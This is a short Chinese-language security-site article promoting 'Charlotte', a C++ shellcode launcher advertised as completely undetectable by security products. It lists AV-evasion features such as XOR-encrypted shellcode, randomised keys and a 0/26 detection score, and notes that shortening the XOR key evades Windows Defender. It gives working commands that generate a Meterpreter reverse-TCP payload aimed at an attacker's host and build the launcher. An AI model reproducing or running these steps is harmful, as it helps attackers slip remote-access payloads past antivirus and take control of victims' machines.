Charlotte:不会被检测到的Shellcode启动器

admin 2021年10月5日00:34:41评论91 views字数 694阅读2分18秒阅读模式

关于Charlotte

Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

工具特性

截止至2021年5月13日之前,该工具的检测结果为0/26;

该工具支持动态调用Win32 API函数;

对Shellcode和函数名进行异或加密;

每次运行随机化异或密钥和变量;

在Kali Linux上,只需运行“apt-get install mingw-w64*”即可;

支持随机字符串长度和异或密钥长度;

antiscan.me

Charlotte:不会被检测到的Shellcode启动器

工具使用

首先,我们需要使用git clone命令将该项目源码克隆至本地,并使用脚本工具生成Shellcode文件。具体操作示例如下:

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

cd charlotte

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

python charlotte.py

使用msfvenom -p测试以及Cobalt Strike原始格式Payload

Charlotte:不会被检测到的Shellcode启动器

强化功能

很明显,Windows Defender是能够检测到.DLL代码的,但我们在POC中通过将16字节大小的异或密钥降低至9个字节,就可以规避检测了。

项目地址

Charlotte:https://github.com/9emin1/charlotte

本文始发于微信公众号(盾山实验室):Charlotte:不会被检测到的Shellcode启动器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月5日00:34:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Charlotte:不会被检测到的Shellcode启动器http://cn-sec.com/archives/394032.html

发表评论

匿名网友 填写信息